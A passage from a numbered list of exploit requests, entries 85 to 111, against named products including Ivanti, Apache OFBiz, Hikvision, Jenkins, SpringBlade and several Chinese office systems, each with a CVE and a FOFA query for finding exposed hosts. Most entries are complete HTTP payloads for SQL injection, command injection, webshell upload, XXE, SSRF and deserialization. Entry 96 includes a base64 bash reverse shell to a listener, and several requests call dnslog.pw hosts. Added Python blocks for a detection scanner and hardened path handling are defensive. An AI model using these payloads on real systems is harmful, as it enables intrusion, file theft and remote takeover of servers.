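    "e56_tail": ("POST /api HTTP/1.1", "Content-Type: application/json",
                 '{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0",'
                 '"StartInfo":{"FileName":"cmd","Arguments":"/c ping 6qevyvmi.dnslog.pw"}}'),
    "e57": ("GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1", "", ""),
    "e60": ("GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1", "", ""),
    "e62": ("GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true"
            "&page=||echo+\"09kdujzKJDLinkQTLfGzMMKDJ23HJ\"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1", "", ""),
    "e63": ("POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1", "",
            "path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A"),
    "e64": ("POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1", "Content-Type: text/xml",
            "<sId>1';waitfor delay '0:0:5'--+</sId>"),
    "e66": ("GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL"
            "%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL-- HTTP/1.1", "", ""),
    "e70": ("POST /member/success.aspx HTTP/1.1", "SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=\nTYPE: C", "__VIEWSTATE=AAAA"),
    "e72": ("POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1", "",
            "S=ajaxColManager&M=colDelLock&xmlValue=%3C%21DOCTYPE+foo+%5B%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2F"
            "c%3A%2Fwindows%2Fwin.ini%22+%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"),
    "e76": ("POST /service_transport/service.action HTTP/1.1", "",
            r'{"command":"GetFZinfo","UnitCode":"<#assign ex = \"freemarker.template.utility.Execute\"?new()>'
            r'${ex(\"cmd /c echo x >./webapps/ROOT/x.txt\")}"}'),
    "e79": ("GET /goform/webRead/open/?path=|id HTTP/1.1", "", ""),
}


def scan(samples=SAMPLES):
    """Run every sample; return {label: [rule, ...]} for those that fire."""
    report = {label: analyze(*req) for label, req in samples.items()}
    return {label: hits for label, hits in report.items() if hits}


if __name__ == "__main__":
    for label, hits in scan().items():
        print(f"{label}: {', '.join(hits)}")
```

The decode-before-match order matters: a rule that runs on the raw request misses the base64 SQL of entry 60 and the base64 command of entry 70 entirely, and misses the `%0a`-separated commands of entries 86 and 88 unless it decodes percent escapes first. The rule names and keyword lists are a starting point for a WAF or log pipeline, not a complete signature set.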
85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
Exploit request; the body (elided as PAYLOAD) drops a Godzilla webshell. accountId traverses out of the upload location into tomcat/webapps.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Shell URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
The host value of the ping test is passed to a shell; %0a breaks out of the ping command and ${IFS} stands in for a space.
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DAS-Security) 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
The suffix parameter is appended to the stored file name unchecked, so /../../../jfhatuwe.php moves the file out of the preview directory and gives it a .php extension.
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The file is then reachable at /jfhatuwe.php.

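Entries 67, 80 and 87 are the same bug three times: a client-supplied directory, file name or suffix is joined onto the upload root, so ../ or a chosen extension puts a script where the web server executes it. The Python below is an added example, not code from the article or from the affected products. naive_target reproduces that join with the three parameter sets from the entries above; hardened_target shows the confinement a safe handler needs (allow-listed extension, directory checked after normalisation, server-chosen file name). BASE_DIR and ALLOWED_EXT are assumptions made for the illustration.

```python
import posixpath
import secrets

BASE_DIR = "/srv/app/uploads"                   # assumed upload root (illustration)
ALLOWED_EXT = {".png", ".jpg", ".pdf", ".txt"}  # assumed allowlist (illustration)


class UploadRejected(ValueError):
    """Raised by hardened_target when a request would leave the policy."""


def naive_target(dir_param, name_param, ext_param):
    """What the handlers in entries 67/80/87 effectively do: join attacker-
    controlled directory, name and extension onto the upload root and use the
    result. posixpath keeps the arithmetic platform-independent."""
    return posixpath.normpath(posixpath.join(BASE_DIR, dir_param, name_param + ext_param))


def hardened_target(dir_param, name_param, ext_param, rand=secrets.token_hex):
    """Confine the upload: extension from an allowlist only, the directory must
    still be under BASE_DIR after normalisation, and the stored name is
    server-generated, so name_param is deliberately never used in the path."""
    ext = ext_param.lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension not allowed: {ext_param}")
    # lstrip("/") stops an absolute dir_param from replacing BASE_DIR in join()
    target_dir = posixpath.normpath(posixpath.join(BASE_DIR, dir_param.lstrip("/")))
    if posixpath.commonpath([BASE_DIR, target_dir]) != BASE_DIR:
        raise UploadRejected(f"directory escapes upload root: {dir_param}")
    return posixpath.join(target_dir, rand(8) + ext)


def reject_reason(dir_param, name_param, ext_param):
    """None if the hardened resolver accepts the upload, otherwise why not."""
    try:
        hardened_target(dir_param, name_param, ext_param)
    except UploadRejected as exc:
        return str(exc)
    return None


# The three parameter sets from this section, as the vulnerable join sees them.
ABUSES = {
    "e67": ("../platform/portal/layout/", "apoxkq", ".jsp"),  # dir= and fileType=
    "e80": ("", "../xykqmfxpoas", ".jsp"),                   # report=../x.jsp
    "e87": ("", "123", "/../../../jfhatuwe.php"),            # name= and suffix=
}

if __name__ == "__main__":
    for label, params in ABUSES.items():
        print(label, "naive ->", naive_target(*params), "| hardened ->", reject_reason(*params))
```

The order of the checks is deliberate: the extension test runs before any path arithmetic, and the directory test compares the normalised result with the root rather than looking for ".." in the input, so encodings and odd separators that normalise to a climb are caught the same way. On a real server the same comparison should be made on os.path.realpath output so symlinks cannot re-open the escape.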
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
The type parameter is passed to a shell. Decoded, it injects a newline followed by
echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The written file is then reachable at /txzfsrur.php, the name used in the request above.

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
The p of .jsp is sent as %70 to get past a filter that matches the literal .jsp suffix; Tomcat decodes it and serves the JSP. A vulnerable target evaluates 111*222 and shows 24642 in the response.
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
The jsondata[ip] value of the ping helper is executed as a command.
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 47
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
The ..;/ segment is a Tomcat path-parameter trick: a front-end rule sees a path under /center/api/task/, while Tomcat strips the ; path parameter, resolves the .. and dispatches to /center/api/orgManage/v1/orgs/download, whose fileName parameter is not confined to its directory.
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

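Entries 68, 69, 89 and 91 all exploit the gap between the path a front-end filter sees and the path Tomcat actually serves: ;.js and ..;/ are path parameters that Tomcat strips per segment, and %70 is decoded to p only after a literal .jsp check has already passed. The Python below is an added example, not the article's or any vendor's code; it approximates that canonicalisation and evaluates the same access policy before and after it so the disagreement is visible. UNAUTH_PREFIX, STATIC_SUFFIXES and the policy itself are assumptions for the illustration, and the fileName traversal of entry 91 (a parameter, not the path) is outside what this block addresses.

```python
from urllib.parse import unquote

# Assumed front-end policy for the illustration: requests under this prefix
# are let through without a session, and static-looking files skip the auth filter.
UNAUTH_PREFIX = "/center/api/task/"
STATIC_SUFFIXES = (".js", ".css", ".png", ".gif")

# Request paths taken from entries 68, 89 and 91 of this list.
E68 = "/defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1"
E89 = "/sysform/003/editflow_manager.js%70"
E91 = "/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd"


def tomcat_normalize(uri):
    """Approximate the servlet path Tomcat derives from a request URI: per
    segment, strip ';param' path parameters *before* percent-decoding (so
    ';.js' and '..;' lose their tail), reject a decoded path separator
    (Tomcat refuses %2F by default), then collapse '.' and '..'. This is an
    illustration of the container's behaviour, not its code; Tomcat itself
    answers 400 to a climb above the root, which this version just clamps."""
    path = uri.split("?", 1)[0]
    out = []
    for raw_seg in path.split("/"):
        seg = unquote(raw_seg.split(";", 1)[0])
        if "/" in seg or "\\" in seg:
            raise ValueError("encoded path separator rejected: %r" % raw_seg)
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def is_rejected(uri):
    """True when tomcat_normalize refuses the URI outright."""
    try:
        tomcat_normalize(uri)
    except ValueError:
        return True
    return False


def decision(uri, canonicalize=None):
    """Evaluate the policy either on the raw URI (canonicalize=None, as a naive
    gateway does) or on the path the backend will really serve."""
    path = canonicalize(uri) if canonicalize else uri.split("?", 1)[0]
    unauthenticated = path.startswith(UNAUTH_PREFIX) or path.endswith(STATIC_SUFFIXES)
    return {"needs_auth": not unauthenticated, "is_jsp": path.lower().endswith(".jsp")}


def compare(uri):
    """Side-by-side view of the two decisions for one request."""
    return {"naive": decision(uri), "canonical": decision(uri, tomcat_normalize)}


if __name__ == "__main__":
    for label, uri in (("e68", E68), ("e89", E89), ("e91", E91)):
        print(label, tomcat_normalize(uri), compare(uri))
```

The practical rule this demonstrates: any allow-list, deny-list or static-resource shortcut in front of a servlet container must be evaluated on the canonical path (path parameters removed, percent-decoded, dot segments collapsed), or simply moved into the application where the container has already done that work. A filter that matches the raw URI string will agree with Tomcat on ordinary requests and disagree exactly when an attacker wants it to.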
92. Hikvision operations management center session command execution
Fastjson deserialization. The Testcmd header carries the test command (echo test); the JSON body is elided as PAYLOAD.
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 (QI-ANXIN) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

The upload is stored under /attachements/ with its original name:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
